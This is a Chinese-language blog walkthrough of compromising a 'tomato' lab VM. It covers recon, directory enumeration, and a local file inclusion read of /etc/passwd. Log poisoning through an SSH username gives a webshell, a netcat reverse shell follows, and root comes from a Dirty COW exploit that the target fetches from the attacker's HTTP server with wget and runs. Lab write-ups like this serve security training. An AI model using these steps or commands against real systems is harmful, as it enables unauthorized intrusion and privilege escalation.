tomato渗透报告
一:环境:
攻击机:kali:192.168.145.128
靶机:tomato:192.168.145.182
工具:
二:渗透过程
arp-scan -l扫一下,发现疑似靶机 ip 192.168.145.182
简单扫一下,观察开放端口,确定该ip是攻击目标

注意:这个命令后面对应的SERVE只是对应nmap内部的服务映射表,并不一定是攻击目标的端口服务
所以我们再侵略性扫一下

看回显,分析一下得到的信息:
目标为Linux,内核版本号是3.2-4.9
22端口——对应ftp(文件传输协议),可以尝试匿名登录
80与8888端口——对应http协议,一个apache一个linux
2211端口——对应ssh远程连接协议
先尝试一下ftp匿名登录
1 | ftp 192.168.145.182 |
这里我尝试了annoymous,tomato,admin几个常见的name,包括hydra爆破前1000个名字都以失败告终

换方法,去火狐里尝试走http
80出来一个large tomato

88出现一个登录页面

感觉都无法利用,于是dirb扫一下目录,看有没有可以用的子url

发现3个,依次访问一下,第一个发现信息回显,第二个还是large tomato,第三个403(服务器理解请求,但拒绝授权——权限不足)
第一个链接是返回父目录链接
第二个是文件夹,我们点开看看


info.php ← 显示PHP/服务器信息
phpinfo.php ← 同上
debug.php ← 调试功能,可能有敏感输出
点进去看,的确回显了php信息,查看一下页面源码,源码提示我们存在一个文件包含漏洞(很像动态一句话木马),并且include里面通过get传参
ps:服务器会把我们包含的任何文件作为php代码执行,如果包含有效的代码,执行并返回结果,如果不是php代码,就直接回显文件内容

再确定一下:
在url后面令?image=../../../../../etc/passwd(注意:../从3个到6个递增尝试看是否有回显)
成功得到了有tomato的用户名列表:表示一个普通用户 tomato,UID=1000,有 bash 登录权限
ps:这里可以看到后面还有两个sshd和ftp用户,都是服务账户,无法登录
所以我们现在确定了有文件包含漏洞,并且得到了我们下一步攻击要用的用户名——tomato

梳理一下攻击流程:我们现在已经能用文件包含漏洞有限访问一些配置文件了,下一步尝试用这个漏洞完全操控靶机
也就是尝试获得一个shell,进而用python语句形成交互型shell
也就是上传木马,通过url查看/var/log/auth.log文件,发现有回显,所以我们可以产生通过报错把木马写入日志文件里

尝试远程连接报错
回到kali靶机,通过2211端口ssh一句话木马

去我们主机的powershell看一眼具体报错,报的是引用变量的错

刷新日志看看有没有写进去
换种方法:使用 -l 参数指定用户名
ssh -l ‘ ‘ 192.168.145.182 -p 2211
成功了

随便输点密码,刷新日志,看到报错回显
蚁剑连一下日志试试
连接成功

添加后打开虚拟终端,分析回显
- 内核:
4.4.0-21-generic(2016年Ubuntu) - 用户:
www-data(低权限) - 已知用户:
tomato(UID 1000)
所以下一步就是建立稳定的反弹shell,和提权
反弹shell的建立:
现在kali里面随便找个每用的端口开开,我开了1234
- **
nc**:netcat 工具 - **
-l**:监听模式(listen) - **
-v**:详细输出(verbose),显示连接信息 - **
-n**:不进行 DNS 解析,直接使用 IP - **
-p 1234**:指定监听端口为 1234

bash反弹:

连接成功

1 | 继续到tmp目录 |
看开头爆出来的几个CVE漏洞,我们尝试第一个脏牛

执行试试
Kali下载编译(用不同exp)
cd /tmp
wget https://www.exploit-db.com/download/40616 -O dirty_simple.c
gcc dirty_simple.c -o dirty_simple -static -pthread -lcrypt
python3 -m http.server 8081
目标机
cd /tmp
wget http://192.168.145.128:8081/dirty_simple
chmod +x dirty_simple
./dirty_simple
提权成功
- Title: tomato渗透报告
- Author: Le_ee 博客等级 码龄1年
- Created at : 2026-01-28 07:32:27
- Updated at : 2026-02-05 10:51:27
- Link: https://leei.site/2026/01/28/tomato靶机wp/
- License: This work is licensed under CC BY-NC-SA 4.0.
